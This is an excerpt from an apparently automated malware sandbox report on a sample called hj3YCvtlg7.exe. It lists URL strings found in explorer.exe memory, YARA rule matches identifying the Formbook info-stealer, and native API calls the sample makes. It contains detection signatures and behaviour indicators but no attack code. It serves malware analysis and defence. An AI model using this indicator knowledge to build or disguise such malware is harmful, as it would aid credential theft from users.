          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
          Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
          Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
          Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.2299319275.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
          Source: explorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: hj3YCvtlg7.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
          Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: hj3YCvtlg7.exe PID: 7832, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 7884, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A35C NtCreateFile,5_2_0041A35C
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A40B NtReadFile,5_2_0041A40B
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_0041A53A NtAllocateVirtualMemory,5_2_0041A53A
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762B60 NtClose,LdrInitializeThunk,5_2_01762B60
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01762BF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk,5_2_01762AD0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01762D30
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01762D10
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01762DF0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk,5_2_01762DD0
